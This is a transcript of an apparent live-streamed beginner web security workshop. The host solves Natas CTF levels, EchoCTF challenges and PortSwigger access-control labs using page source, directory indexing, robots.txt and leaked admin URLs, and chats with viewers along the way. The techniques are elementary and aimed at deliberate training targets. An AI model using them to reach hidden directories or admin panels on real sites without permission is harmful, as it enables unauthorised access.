over on this page, we can go up into the address bar, and we can change the level number. So it currently says Natas 0. We're just going to edit the number so that it says Natas 1 instead. And then after we do that, we hit enter, and it'll ask us for the username and the password one more time. Remember, each time you access a new level, you need to use a different username. So because this is level Natas 1, the username has to be Natas 1. After you do that, click on the password field and paste in the password. I don't recommend typing out the password because that is not going to be very fun. So remember, everybody, you can right click and select paste to paste in a password. You can also use the Control V keyboard shortcut on Windows. I'm not too sure what it is on Mac. Is it like Command V? But on Windows, hold down the Control key and then hit the V key on your keyboard to paste in the password. Then click on Sign In. Okay, so this is the next level. So over here it says, you can find the password for the next level on this page, but right-clicking has been blocked. Oh, okay. So on Mac it is Command V. Awesome. Thank you. Thank you very much, guys. Okay, so you can find the password for the next level on this page, but right-clicking has been blocked. So what are some other ways we can access the source code? So if we think that we need to access the source code to find the password, and we try right-clicking on this page, we see a message here that says right-clicking has been blocked, so we can't use that method. J Money says F12. Yeah, there's a number of different ways we can get access to the source code. So what we're talking about here is we're talking about lateral problem solving. So they say that when hackers encounter a locked door, they look for an open window. So we can look at web app security in terms of checking which doors and windows are locked and which ones can be opened. So if the web application doesn't let you right-click to access the context menu, then we could use a number of different things to solve the problem. So this is where a security tester's most powerful tool, research, comes into play. Two common research tools used these days are ChatGPT. Oh, I misspelled that. ChatGPT and the Google search engine. I mean, there's any number of AI tools you can use to answer questions like this. So, I mean, we could ask a question like, what are some different ways we can see HTTP source code in the web browser if mouse right-clicking is not possible? SetiBlogger says the copy command is Command-C and the paste is Command-V for Mac. Awesome. Let's see, Control-U, click the three stripes at the top right, and then go to Tools. I mean, there's a bunch of different things we can do. I mean, let's give this a try. So if we go over to Google, for instance, and just type in what are some ways we can view a web page's source code. Okay, and then it'll give you a bunch of different answers. Okay, viewing a web page's source code is a fundamental skill for web developers, designers, and marketers. And we got keyboard shortcuts. You can use Control-U. On Mac, you would use Option and Command plus U. You can right-click. We can't use that one. We could also use the browser developer tools, inspect elements. And you can also view source. So one thing that a lot of people don't know is that you can view the source of a web page by just putting the words view source in the address bar right before the page. So if we go over to Natas 1, we can manually insert view -source : and this is what it would look like if you paste it into your web browser. So if you hit enter with view source on this page, then we get access to the source. So of course we could use the Control-U keyboard shortcut. Oops, I closed the page. Okay, you can also use the Control-U keyboard shortcut. And I think there's also like F12. You can use F12 and then you can go to inspect. And you can take a look at the source code inside the inspector. So in the inspector, we also see the comments with the password for the next level. So there's a bunch of different ways we could access this. So I'm just going to use the Control-U keyboard shortcut because it's the easiest thing for me to remember. And we see the password for the next level in here. So the password for Natas 2 is this. So I'll just copy this for everybody who's playing along. F12 or Shift-I. Does Shift-I work? Hold on, let me give that a try. So Shift and I. Is that after? So F12, Shift-I? Nope. Am I missing something here? Anyways, okay, so we get access to the next level. So remember everybody, you can go up to the address bar and then replace the number 1 with the number 2 to move on to the next level, Natas 2. Okay, they'll ask you for a password. The username is always going to change. So before we were Natas 1, and now we are Natas 2. Only Shift I. Oh, okay. We can copy the password, and then we can paste it in. So Natas 2, paste in the password, click on sign in. Okay, so this level is a little bit more difficult than the previous levels, but not by much. So on the page for Natas 2, it says there is nothing on this page. But if we remember what we were doing on the previous levels, we know that we should check out the source code. So we can right click, we can view the page source, or of course we can use the keyboard shortcuts Control U. Either way, we take a look at the source, and we can safely ignore everything in this portion of the web page code, because it says the stuff in this header has nothing to do with the level, which means that we can ignore everything from this header here until this header here. So we can ignore all this stuff. Inside of here, there's the answer for how to access the next level. But what inside of this code should we be paying attention to? Okay, if you've got the answer, let us know in the chat. But there is something in here that we should be paying attention to. Okay, J Money says the files. That is true, we should be paying attention to the files. So what we've got here is we've got an image source. So an image source is letting the browser know what file to load up for an image. And in this case, it's files/pixel.png. So if we click on pixel.png, we can see that it is literally a pixel, and that it's a single dot. So it's an image, it's a single dot, and it was actually on this page. Oh, where is it on this page? Am I going... Is this it right here? I can't even tell. But we're not actually supposed to pay attention to the pixel.png image. There's something else. There's something else about this source that we need to pay attention to. It's not in the image. No, we're not supposed to be paying attention to the image. So this... I'll wait a few seconds to see if anybody catches on to what we should be paying attention to. It is on line 15. It is something in here. The files directory, yeah, that's what we need to pay attention to, Moza. That's correct. So this lets us know that there's a pixel.png file, but it also lets us know that there's a directory. So let's talk about it over here. So this is the file that is loading up pixel.png. But it also lets us know that there's a files directory where it looks for this particular PNG file. So if we know that there's a files directory, we can look directly inside of this files directory and see if there are other files there. So directory enumeration is pretty important in a lot of CTF exercises that involve web apps. So we can go up to the address bar, we can get rid of pixel.png, and navigate directly to the files directory. And if we do that, and we're not looking at view source, then we see this. So it says index of /files. So if you've been on the internet for a long time, I can sense that +1 hacking skill point in the back of my head. Nice. So if you've been on the internet for a while, you might have seen pages that look kind of like this, that say index of something something. And this is increasingly rare these days, but for a lot of like old websites, you might be able to look inside of directories and see everything inside. So this is directory indexing. Yeah, that's the name of the vulnerability. And this should not be allowed as well as far as security is concerned on web applications. So we've got a pixel.png file. There's also a users.txt file in here that we can access directly. So if we click on it, we see here that there's a bunch of usernames and passwords. So we got Alice and Bob and Charlie. We also have the password for the next level, which is Natas 3, and this password. So if you've been around a lot of like computer systems, this is the preferred way to do username and password pairs. So the username goes here, and then a colon, and then the password. So this is the same format you got here, Alice colon password, Bob colon password. Here it's Natas 3 colon password. Okay. So before we move on, let's talk about, let's review that particular vulnerability. So this is directory indexing. So directory indexing is an insecure setting on websites that allows users to see the file contents of web directories. Although it's quite rare to encounter this issue on modern websites, it's still very common to find on older websites. So if you're dealing with a web application that is fairly old, there might be directory indexing enabled on certain directories in the application. Hanky Lodwick says, "Good morning, sir. Love to see your stream with a cup of coffee in the morning." Hello, Hanky. Nice to see you here. Okay, so if directory indexing is enabled, and a malicious user is able to discover different directory paths on the website, either through guessing, HTML source analysis, or directory busting, then sensitive files may be discovered, stolen, or otherwise abused. Okay, we got a break, an ad break going on Twitch right now, so we're just going to take a little break ourselves, and we're gonna hang out with the birds. So I've got a bird feeder. And I've got cam footage of the birds eating at the bird feeder. Here's a lovely Stellar's jay. We'll be back in about 50 seconds, but enjoy the music and enjoy the birds. We'll be back in a second. Okay, if anybody's wondering what kind of birds these are Stellar's jays. So you spell it like this. And these are my favorite bird. We'll put the birds away, we'll get back to the hacking. Okay, so Philip asks, how does one identify which directory to use? And thank you very much, Daniel Freitas Lemos, for subscribing on YouTube. So the way we identify which directory we use for directory indexing is that we would use either guessing, HTML source analysis, or directory busting. There's a bunch of different ways we could potentially look for valid directory paths on an application. Okay, so let's go ahead and are you part of the Rise Up Collective? I am not. But Meowser Kaiser, hello, nice to see you here. And Space Station Net, good evening to you too. Okay, so let's go ahead and move on to the next level. But before we do that, let's talk about HTTP requests. HTTP is the backbone of the internet, and all web browsers receive web page contents by sending HTTP requests to web servers. So we have to send a request to get a reply. In return, the web servers send the web browser an HTTP response, which is rendered by the browser and then presented to the user. And HTTP uses what are called request methods. Each HTTP request is made with a specific HTTP method, which tells the web server what kind of interaction you want from it. So a lot of the time, when we're using our web browser, we use the GET request. Okay, JMoney says, does something like Dirbuster scans, do they scan for common or known directories? Yeah, that's exactly what tools like Dirbuster do. If you made a directory with random text, would it be able to find it? Probably not. If you make a directory with just a bunch of like random text, for example, I make a directory called let's see, theshyhat.com, and then directory name bunch of random numbers and symbols, then your directory scanning tools are probably not going to be able to identify this, especially if the directory name is really long. But I mean, this is considered kind of security by obscurity. If you use math.random, it's not actually random. I mean, I'm not too sure about the actual randomness of it, but I mean, you still might be able to discover this directory if you scan the website for long enough. It will take a long time, though. Okay, so HTTP request methods. The most common HTTP method is the GET method, which retrieves the contents of web pages. So anytime you're just loading up a website, you're probably using the HTTP GET method to retrieve the website. So the web server will always return an HTTP status code with its response in the form of a 3-digit number. Any code in the 2XX range is considered a successful response. So typically you get an HTTP 200 when you successfully get a response from a web page. Okay, and let's go ahead and move on to the next level. So we know that the password for Natas 3 is this. We'll manually navigate to Natas 3 by going up to the address bar and replacing the number 2 with the number 3. And then we have to put in our username. So the username for Natas 3 is Natas 3. The password, we need to paste that in. So we'll do that now. Okay, so this is Natas 3, and once again it says there is nothing on this page. I mean, whether or not there's actually nothing on this page, it's debatable. So if we're doing the same thing we're doing on every one of the other levels that we've done so far, we would take a look at the web page source. So right-click View Page Source, and remember, we can ignore all the stuff in the header. So we only need to pay attention to the web page code from line 11 until line 18. So this stuff right here. So it says here, no more information leaks. Not even Google will find it this time. So if you know what this comment is referring to, let us know in the chat. But otherwise, I'll go over it in just a moment or two. So there's a certain trick that we need to know to get access to the next level. SysOS says Google Cache. I mean, I don't think it's Google Cache in this case. So remember the path, we can use double dots for path traversal. I'm not too sure if we're doing path traversal in this level of the game. But the thing that we're going to be talking about in this level is actually a very common thing in easy CTF games that feature like web app security challenges. Maybe Mr. Robot knows, maybe it does. Philip says, does the HTTP version have a 1, 2, or 3? I mean, there are different versions of HTTP in use. I mean, I'm not super knowledgeable about it, but HTTP comes in different versions. So there's 1.0. I don't think anybody uses 1.0. there's 1.1, there's HTTP2, there's also HTTP3. I'm sure there's some knowledgeable people in the chat that can let us know about the different HTTP versions. Currently in use, HTTP versions 1.0, 1.1, 2.0, and 3.0. Okay, so let's talk about Mr. Robot. So you need to find something which web browsers can't find. It's not the web browsers. It's not the web browsers that can't find it in this case. It's the web. It's the search engines that can't find it. The end of the web page URL. Okay, so I'll talk about what's going on in this level. Where's my presentation? Here it is. Okay, so in Natas 3, we're dealing with robots.txt. So search engines such as Google, Yahoo, DuckDuckGo, etc., they use programs called robots to visit websites and map out their web pages. So this is called search engine indexing. However, this may cause sensitive areas of the website to appear in search results. So websites with sensitive areas don't want the search engines to index these sites. So what they use is a file called robots.txt. Let's see, SysOS says 1.0 is bare minimum, doesn't have anything to do with headers. 1.1 is the standard HTTP. HTTP2 is the quick standard from Google, and HTTP3 is the next gen HTTP. Okay, so robots.txt is used by website administrators to prevent sensitive areas of the website from being indexed by search engines. So they can add a file called robots.txt to their website, which specifies which directories and/or web pages of the website are off limits to search engine robot programs. So unfortunately, if malicious users know how to find the robots.txt file, the contents of the file could potentially lead them to sensitive areas of the website. So robots.txt is a pretty commonly used file. You can actually find it on google.com. So google.com/robots.txt. So this will let search engine robots know which parts of the website are allowed and disallowed from being indexed. So it allows certain user agents, which are certain robots, crawling robots, I guess in this case. You can disallow specific directories and you can allow other directories. So this is known as blacklisting and whitelisting. And we could disallow all of these endpoints that we don't want to be indexed, and we can allow the ones that we want to be indexed in this manner. So I mean the robots.txt file for google.com, it's pretty long, but includes a lot of different entries. It makes it so that certain web pages don't get recorded by your search engines. Anyways, let's move on. So over at Natas 3, it says no more information leaks, not even Google will find it this time. This is a reference to the robots.txt file. So if there's a robots.txt file on the website, it's typically going to be on the web root, which means that it's right after the domain. So right after the domain, type in / and then robots.txt. So if the robots.txt exists, then it's going to tell you what user agents or what crawling agents it allows and which entries are disallowed. Okay, Google uses a web crawler, and the file basically tells the crawler what not to access. That's true. That's true, Meowser Kaiser. So in this case, it's disallowing this directory right here called secret. And I mean, this is kind of like a double-edged sword. It tells the search engines, don't look inside this directory because it's, sensitive. But to bad guys, they could look inside the robots.txt file and they would know where to look because the stuff inside of robots.txt might be sensitive parts of the website. So what we can do is we can take this directory, we can delete robots.txt, and we can replace it with the secret directory that we got from the robots.txt file. So inside this directory, there's our good old friend directory indexing over here. Not Krenovi, what the heck is this? I'm not too sure what you're trying to communicate here. Okay, so in here, there's a users.txt file like there was before, so we can click on it. And we see the password for the next level, Natas level number 4. So let's copy this. Some cipher. Is it a cipher? Okay, so if we wanted to access the next level, it would be Natas 4 with this password. We'll access the level just to double check that this is the correct one. So what we can do is we can go over to the address bar, plug in Natas 4, get rid of the secret directory because we're not, there's no secret directory on the next level. It'll ask us for the password and the username. So the password is Natas 4, and the password we plug in, paste it in, click on sign in, and this is the next level. So Natas 4. We're not going to be doing Natas 4. We're going to be doing Natas 4 the next time we do one of these lessons, which is going to be on Monday. Not on Monday, on Wednesday. But yeah, if you want, you can skip ahead in these levels as well. But let's talk about what we learned in today's lesson. Before we talk about what we learned in today's lesson, we can also do some other challenges, because we've got I've got a number of other web app challenges that kind of use the same concepts that we learned today. Let me go ahead and get that. Where did I put that thing? Okay, over here. Steady Blogger says, I have a question. Is it possible to, modern web sites into older types, which are easily... I'm not too sure. Could you type out the question again, Study Bloggers? What's happening right now? So we're going to be solving some extra exercises. So over at EchoCTF, there are a couple of challenges that we can do to reinforce what we learned today. So what you can do is you can go over to EchoCTF.com. If you don't have an account over there, you can make one. It's a very good website for learning about all sorts of security concepts. So go over to EchoCTF.com and then log in. And then the first challenge we're going to be doing is called Where Are the Robots? So I'll just get the link for everybody. He's trying to say, can we convert modern websites into older versions? Convert modern websites into older versions. I mean, we can view the earlier versions of some famous websites using the Wayback Machine. Meowzer Kaiser says, so to clear Natas 4, you need to change the header into header info using curl. I mean, there are a bunch of different ways you could use to solve Natas number 4. You could also use the web browser, because the web browser lets you change headers as well. We'll demonstrate that next time. But yeah, let's do this exercise. So this one's called Where Are the Robots? So if you're logged into EchoCTF, I mean, the challenge is called Where Are the Robots? So we're probably dealing with robots.txt, but what I wanted to do is I wanted to illustrate a couple of other exercises where the same kind of stuff comes up. So can you find the robots? Additional details will be available after you're launching your challenge instance. So there's a button in the challenge that lets you launch the challenge instance. Okay, and then we're given a website. So can you find the robots? We've got a website. We can grab the link and then paste it into our web browser. And over here it says, where are the robots? Okay, some websites never get taken down and are still connected to the home server. All right, so in this challenge, we're going to be looking for the robots one more time. So remember, to access the robots.txt file, you click on the address, you type in / and then robots.txt. Okay, and then here, just like the other challenge, we've got user agent and we've got disallowed this directory right over here. So I mean, normally we wouldn't be able to guess at the name of this web page, but if we know it's here, we can copy it, and then we can replace robots.txt with that page. Okay, it says guess you found the robots, and then we get the flag. So what we can do to solve the challenge is we can grab the flag, copy it, and then go back to the challenge down at the bottom, paste in the flag, and submit it. Okay, Hassan says, I'm new to the IT world. Is reporting a bug to open source project, can you get paid? I mean, maybe? It depends on the open source project and whether or not they have a bug bounty system, like a bug bounty program. What I would do is I would do a little bit of searching. So if you want to get paid for reporting a bug, you'd have to do like a search. So for instance, say you find a bug in Facebook, you type in Facebook bug bounty program, and then on the resulting page, it would show you if the company has a bug bounty program and then where to access it. But not every project has a bug bounty program. Okay, so I think there's at least one other challenge we can do today. Okay, so we got includes over here. It's another challenge. Here's the link. Space Station Net says, in my opinion, bug bounty has taken a huge hit. It's not what it used to be from what I've heard. J Money says, if the open source project doesn't have a bug bounty program, just sell it. I mean, I don't know if I would do that. Okay, so the next challenge is this one over here. So this is the includes challenge. So it says here, can you get the flag? Additional details will be available after launching your challenge instance. So we're going to launch the challenge instance. Kaiser says, I'm thinking that I would use AI and cybersecurity both. Okay, the white boy, what would you recommend I learn to do back-end development? I just learned classes well, and I'm still stuck on easy and medium for leet code. So, I mean, I'm not really a software developer. So, I mean, if you're talking about back-end development, leet code's good. The other website that you could look into is Masterism or Exorcism. Is it called Exorcism? Exorcism.org. This is a pretty good website for honing your programming skills. Okay, and what were we doing? We're doing a challenge. Right. Okay, so we're going to, after we launch our instance, it says go to this website and see what you can discover. So we're looking for a flag, like we are in most of these exercises. Okay. Okay, J Money says, if you want to learn back-end development, pick one language and learn how databases are built. Learn how to build APIs. So this is the challenge here. On includes. So source Wikipedia on include directive, great. And there's a button over here. It says say hello. If we click on say hello, it says this code is in a separate file. This code is in a separate file. Okay, so like the other challenges that we've done today, we're going to be taking a look at the web page source code. So we can right click and then view page source. And there's something very important in the web page source code. If you think you know what it is, type it out in the chat. Okay, I never followed the advice of pick one language, now I can use many languages. I mean, it's probably better to focus on one language until you get to a certain point, and then you can start learning other languages. So the interesting thing that we saw on the web page is that when we clicked on the button, it said that the code for the button was in a separate file. So NPM says script.js. Yeah, that's what we're looking for. Nope also picks out the script. So source equals script.js. So on web pages, they can reference other files on the website that they can get code from. So for here, we got script.js, we can click on it. And it says here, alert, this code is in a separate file. And we've got we've got part of a flag. So 2 of 2, there's another file that we have to look into as well. So what we're going to do is we're going to copy this part of the flag, and we're going to keep it over at the flag submission field here. We're just going to paste it in, and then we're going to go back to the web page source code. So there's another file we need to take a look at. Which one do you think that might be? So this challenge is essentially teaching us that we can look at different parts of a web page, or different files that are being used to generate the web page. Style, but I don't know if CSS can help. I mean, most of the time we can safely ignore most of the JavaScript files and most of the extraneous files that are being used to create web pages. But in easy level CTF challenges for web app stuff, you need to take a look at every one of these files. So we got style.css, and it says that we've got the rest of the flag. So PicoCTF inclusivity. And we combine these to form the whole flag. Where is the greetings function? So the greetings function is in the script.js. So function greetings, alert, this code is in a separate file. So now that we've got the two separate parts of the flag, we can combine them over here, and then click on submit flag, and then we're finished. Okay, so we might have time for one more. So we did where are the robots, we did includes, and let's try this one called secrets. Okay, I have a question. I want to study cybersecurity, so I studied CWE instead of CVE. Am I on the right path? I mean, where are you coming from, Hassan? If you want to learn about cybersecurity, I think the important thing is to figure out which role you want to do inside of cybersecurity first, because the training is different depending on what kind of job you're going to be aiming for. Okay. So this is the link for the last challenge we're doing today. So it says here, we have several pages hidden. Can you find the one with the flag? So we need to launch the challenge instance. And while that's going on, let me just delete some of these tabs that we're not using. Okay, website is running here. CCNA networking, CCNA security, or A+ is where you start. Well, I mean, check out the website over here. Get into cyber. Okay, do new PCs not come with DVD or Blu-ray burners anymore? Not for a while now, no. It's been a really long time since I've seen any computer with a CD drive. Okay, website is running here. I'll give everybody the link for the website we're looking at. And let's start looking for the flag. Okay, so if security wasn't your job, would you do it as a hobby? Well, just like any of the other pages, well, the other challenges that we've done today, we're going to be taking a look at the web page source code. So let's see. Well, let's use the keyboard shortcut. Okay. So inside the source code is probably the place where we want to look for first. So what do you think we need to take a look at? Do we need to take a look at the other web pages or something else? Okay, Nope says, I'm a Java web dev. I don't know if, I see something about CompTIA Security Plus, just a certificate, something in TryHackMe. The secret directory, right. So there's a secret directory referenced over here in the assets. So this is the image, but like the other challenge we were looking at before, we can also take a look at the other directories, such as the assets directory. So the assets directory is forbidden, which is good from a security standpoint, but we could also go like one layer deeper. So we can go directly to the secrets directory without assets. And what do we got over here? So it says you almost found me, you're doing well. Okay, so let's get rid of the view page source. What does this look like? Finally, you almost found me, you're doing well. So what should we do from here? We should probably take a look at this page's source as well. First idea would be steganography. Steganography, we'll talk about that later. Currently mixed somewhere between security and something else. Okay, so the JPEG file. So where does the JPEG file come from? Well, in this case, it's like a GIF file, a GIF file. So this is probably not what we're looking for, because this points to like an outside URL, which is not part of the challenge. But there is something else in here. Right, hidden files.css. So if hidden file.css is in the hidden directory here, we can click on it. And there's nothing in here. I mean, there's nothing in here, but we know about the directory. So there's a hidden directory. We can just get rid of file.css. Unable to connect. Did something happen to the website? Hold on. Have you watched the video from Lamino about Cicada 3301? I've heard about it. I've heard about it before, but I think the web page might be down. Run out of time? Not sure. No, we still have 10 minutes. Okay, I mean, there's any number of reasons why this might have gone down. Oh well. I guess we can't complete the exercise. That's okay. We'll conclude our lesson, and then we'll move on to the next thing. So let's review the web exploitation concepts we learned in today's workshop. So we learned about lateral problem solving. The most important skill to develop in cybersecurity is researching. Google and ChatGPT are two powerful research tools. Use them wisely. So, I mean, cybersecurity is all about being able to look up the answer, and sometimes looking up the answer is more important than knowing the answer outright. We also learned about directory indexing, and directory indexing is a vulnerability on websites that allows users to see the file contents of web directories, which can lead to sensitive data exposed to arbitrary website visitors. So it's something you'll see in beginner level CTF challenges for web app security, but it's not super common in the real world. And the last thing we learned about was robots.txt. Robots.txt is a special file included on certain websites that indicate which files on a site can and cannot be indexed by search engines. It can be abused to point malicious users to sensitive parts of the website. Is ChatGPT up to date? I'm not too sure about that. What if you run it on the previous tab before the GIF? That's okay. I mean, if you want to give the challenge a try, it's this one over here. I think ChatGPT is fairly up to date now. It used to talk about not having access to modern information, but I don't think it does that anymore. Okay, so robots.txt, and what's next? In the next HackerFrogs After School Web Exploitation Workshop, we'll continue learning web exploitation skills with the Natas CTF. So the next one is going to be on Monday. We've got a schedule for all of our live streams over at the HackerFrogs Reddit, also the Discord. So this one's going to be for week 15. If you want to take a look. You found the flag, J Money. That's awesome. Okay, so let's go ahead and start the next topic. So this is topic number 4. Topic number 4 is PortSwigger Labs. Awesome, awesome. We're doing more web app security stuff. Great. So, but before we do that, let me close out some of these tabs we're not using anymore. Because I hate having I hate having extra tabs open on my browser. So these are access control labs. So access control is a really big topic. Can you do a CTF, please? We've been doing lots of CTFs, Galgal on TV. Thank you very much for following on Twitch, Kubo. And thank you very much for subscribing on YouTube, Lol. Okay, so we're going to be taking a look at the access controls education resources over at PortSwigger. There's going to be a few different labs involved in here as well. If you don't have an account over at PortSwigger, you can make one for free. All of the materials that I like to use on the live streams are all free for the most part. And yeah, so it lets people who don't necessarily have a lot of money get access to quality quality cybersecurity education materials. Thank you for the content. I'm trying to get back into SciSA and Pentest Plus study. This is a huge study material for my little brain. I don't think the brain is so little. Sudo apt upgrade brain, awesome. Okay, well I have to wear glasses with all this screen time. Well, I mean, only if you are having problems. Can you scroll back in the video and watch? Do you want to get a forensics challenge? I mean, we're not really doing forensic stuff today. We're doing web app stuff today. If you're looking for forensic stuff on the YouTube, I've got a bunch of forensic stuff on the YouTube if you want to take a look. We've got a whole playlist full of forensics challenges. Let me grab some for you. Here you go. Okay. But we're talking about access control vulnerabilities. Okay, so access control vulnerabilities and privilege escalation. So in this section, we'll describe privilege escalation, the types of vulnerabilities that can arise with access control, and how to prevent access control vulnerabilities. Okay, Morgado out of context, thank you very much for the subscription on YouTube. And Yanni Stefanov, thank you very much for the sub. Okay, so if you're familiar with basic concepts behind access control vulnerabilities, well, I mean, we'll skip this. What is access control? So access control is the application of constraints on who or what is authorized to perform actions or access resources. In the context of web applications, access control is dependent on authentication and session management. So authentication confirms that the user is who they say they are, and session management identifies which subsequent HTTP requests are being made by that same user. Simon Dante says, I love access controls. IDORs are fun and still surprisingly common. Usually people will use UUIDs for object identifiers, and if you can leak the UUID, it kills the impact. SteadyBloggers asks, according to you, what is the best YouTube channel or vid for intro or ethical hacking and all this stuff? SteadyBloggers, I'll recommend my channel. I'll recommend my channel. I've got all sorts of stuff for beginners on my channel. Anyways, let's see. Access control determines whether the user is allowed to carry out the action they're attempting to perform. Broken access controls are common and can often present a critical security vulnerability. Design and management of access controls is a complex and dynamic problem that applies business, organizational, and legal constraints to a technical implementation. Access control design decisions have to be made by humans, so the potential for errors is high. Okay, and then let's see. Access control security models, we've got this over here, but let's talk about these vertical access controls. Vertical access controls are mechanisms that restrict access to sensitive functionality to specific types of users. And Horak, hello, nice to see you here, and thank you for the subscription on YouTube. Vertical access controls are mechanisms that restrict access to sensitive functionality to specific types of users. With vertical access controls, different types of users have access to different application functions. For example, an administrator might be able to modify or delete any user's account, while an ordinary user has no access to these actions. Vertical access controls can be more fine-grained implementations of security models designed to enforce business policies such as separation of duties and least privilege. We also have horizontal access controls. They're mechanisms that restrict access to resources to specific users. With horizontal access controls, different users have access to a subset of resources of the same type. For example, a banking application will allow a user to view transactions and make payments to their own accounts, but not the accounts of any other user. Okay, so let's see. Meowser Kaiser says, how secure or safe is YouTube usernames or channels? Like, has no one figured out how to find IP or account identification information which is open to the public? I mean, if you've got the name of a user, you can probably find other accounts that were created using that same username. So my name is The Shy Hat, and if you Google The Shy Hat, you can probably find my other user accounts. It's just kind of inevitable that that's the way it works, because most people are going to use the same user accounts across multiple applications. Okay, thank you very, very much for subscribing on YouTube. I'm not too sure how to pronounce that name. Talkane? Okay, we've got context-dependent access controls, and context-dependent access controls restrict access to functionality and resources based on the state of the application or the user's interaction with that. Context-dependent access controls prevent a user from performing actions in the wrong order. For example, a retail website might prevent users from modifying the contents of their shopping cart after they have made payment. I mean, this is really big. If you're able to swap out the stuff in your shopping cart after you pay, that would be very, very bad. Okay, Kubo says possibility of a search term between so that we can search for a perfect match. I mean, I'm not too sure what we're referring to there. But examples of broken access controls. So broken access control is a really big subcategory of vulnerabilities that we find on web applications. Broken access control vulnerabilities exist when a user can access resources to perform actions that they're not supposed to be able to. We can get vertical privilege escalation. We can access unprotected functionality. So for example, a website might host sensitive functionality at the following URL. So we've got an admin endpoint over here. So if an application doesn't restrict who can look at the admin endpoint, that would be a very obvious example of bad broken access control. So this might be accessible by any user, not only administrative users, who have the link to the functionality in their user interface. In some cases, the administrative URL might be disclosed in other locations, such as the robots.txt file. We were just talking about this. So if you go over to an insecure website and look at the robots.txt file, they might have some sort of indication as to where there might be sensitive endpoints. Okay, so we got a lab over here, and the lab is called Unprotected Admin Functionality. So we'll go ahead and take a look at this. If you want to try out the same lab yourself, J Money says, I made an e-commerce site and I didn't think of changing the shopping cart after the purchase. GoBuster will help in this case, I guess. I mean, depending on the level of the lab, most of the easy level labs don't really require you to use any special tools. But let's take a look at the description of the challenge. Thank you very much for subscribing on YouTube, Polly. Much appreciated. Okay, so it says this lab is an unprotected admin panel. Solve the lab by deleting the user Carlos. So poor Carlos is always the victim in this case, in these labs. So we can access the lab. If you're not logged in, they'll ask you to log in. Okay, we log in. So remember, in each one of these labs, there's a specific thing that we need to do. It says that this lab is an unprotected admin panel, and solve the lab by deleting the user Carlos. So where do you think we might find the unprotected admin endpoint? So if anybody has any suggestions, let us know in the chat. Otherwise, we can just start poking around. So this lab, in this lab, the web application is like some sort of e-commerce website. You add stuff to your cart, you make purchases and stuff like that. /admin, that's probably a pretty good guess. The previous literature referenced like a robots.txt file, so we'll check for a robots.txt. Okay, so the robots.txt file points to the administrator panel. So not quite /admin, but we find it nonetheless. So we can copy this, we can navigate directly to the endpoint. Okay, and we've got two things we can do on this page. So this is the administrator panel. We can delete Wiener and we can delete Carlos. Sounds kind of scary. Okay, Pulsar Music Official caught my attention, just got back into Yu-Gi-Oh! It was an interesting timing. Yeah, nice to see you here, Pulsar Music. That was fast. My account? Your account, of course. We're playing FTL music, that's correct. Okay, so to complete the lab, we need to delete the Carlos user. So delete Carlos. And then, congratulations, you solved the lab. So this is done. I guess we can delete Wiener as well. User deleted successfully, no more users, yay. Yu-Gi-Oh! And web hacking, two of my favorite things. Hey, Shay, nice to see you here. Okay, so let's move on. So we solved the lab, it wasn't too difficult, but what did we identify? We identified broken access control. So anybody who has access to the administrator panel here, they can do administrator actions, which is not the way you want to do it. Sorry about the Wiener. Okay, so let's go back to broken access control. So in some cases, sensitive functionality is concealed by giving a less predictable URL. This is an example of so-called security by obscurity. However, hiding sensitive functionality does not provide effective access control because users might discover the obfuscated URL in a number of ways. So imagine an application that hosts administrative functions at the following URL. So, I mean, this looks like anybody It looks like your standard administrator endpoint, but they put some random characters at the end over here. This might not be directly guessable by an attacker. However, the application might still leak the URL to users. The URL might be disclosed in JavaScript that constructs the user interface based on the user's role. Okay. So what do we got in here? Var is admin false. If is admin, so if you are an admin, then set up the administrator panel over here. So this directly leaks out the administrator panel endpoint. That's bad. Looks like a salted endpoint, kind of. So this script adds a link to the user's UI if they are an admin user. However, the script contains the URL. The script containing the URL is visible to all users regardless of their role, which means that these kind of obscured endpoints can still be visible. So we've got another lab over here, unprotected admin functionality with unpredictable URL. So let's go ahead and solve this one. So you could change the JavaScript file and become admin. I don't think it's usually not that easy. Most of the time, that kind of functionality is not client side; it's server side. Of course, it is possible that that the JavaScript can affect, it is possible that the access controls could be accessed server side, sorry, client side, which would be really, really bad. Okay, so this lab is unprotected admin functionality with unpredictable URL. So this lab is an unprotected admin panel. It's located in an unpredictable location, but the location is disclosed somewhere in the application. Solve the lab by accessing the admin panel and using it to delete the user Carlos. So let's go ahead and access the lab. Thank you very much for subscribing on YouTube at Depeche Gohel. I'm not too sure how to pronounce that. Okay, so usually the solutions to these labs are referenced directly in the education materials before this. So we're probably looking at some sort of JavaScript file that lets us know where the administrator panel is. Galagon says, sorry for being out of topic, but do you have any tips for a beginner trying to do CTFs in many categories like web security, forensics, etc.? I mean, it's not like math where there's a book and you can learn. I mean, when you're learning like CTF skills for cybersecurity, if you haven't seen a type of problem before, you're not expected to be able to solve it. What I'd say is that you may want to take a look at my playlist for EchoCTF. It's got a lot of different challenges in there, in different categories. Give this a try. Thank you very much for the subscription on YouTube, L Shop. Thank you. Okay, so let's go over to my account. Oh, we're not given any credentials here, huh? Yeah, we're not given any credentials. That's okay. We'll just go home and then we'll take a look at the code for this web page. View page source. And let's take a look. So we got a my account endpoint. Oh, here we go. var admin equals false. If admin, then set up these links. And there's an admin endpoint here that we can access. So just copy this. Yeah, we checked the source. And thank you very much for subscribing on YouTube, Solo Ascar. Thank you. So we'll just go over to the endpoint that was referenced. And just like the other lab, we can delete our users. So delete Carlos and delete Wiener. Delete Carlos. We solve the lab and then delete Wiener for fun. Okay, let's move on to the next lab. Okay, and we also have parameter-based access control methods. Some applications determine the user's access rights or role at login, and then store that information in a user-controllable location. This could be a hidden field, a cookie, or a preset query string parameter. Can you try setting isAdmin equals true in the console? I mean, I don't think that's the way this... this lab works, because you get access to the admin panel even if you're not an admin. So it's really hard to test. But I mean, we could try. The first thing we would do is figure out what the code is actually here. So var isAdmin equals false. And then just set it to isAdmin equals true in the console. What do we got here? Hold on. Let's bring up the tools. So more tools, web developer tools. We got our console over here. Paste in this, and then set isAdmin to true. And then run. isAdmin equals true. I mean, we can set it. It's just that in this application, it really doesn't get us anything. Thank you very much for subscribing, Joe Secula. Thank you. But yeah, I mean, this kind of thing might pop up in another lab. Not sure. Okay, so parameter-based access control methods. It could be a hidden field, it could be a cookie, or it could be a preset query string parameter. The application makes access control decisions based on the submitted value. For instance, admin equals true. So we could send a URL parameter, admin equals true, or you could send admin parameter role equals 1. So this approach is insecure because the user can modify the value and access functionality that they're not authorized to, such as administrative functions. So I mean, this is not the way to do it. Never write your application so that your admin functionality is passed in through a parameter. That's bad. But anyways, we got 2 extra labs. So user role controlled by request parameter, and user role can be modified in user profile. So we'll do this one, the first one 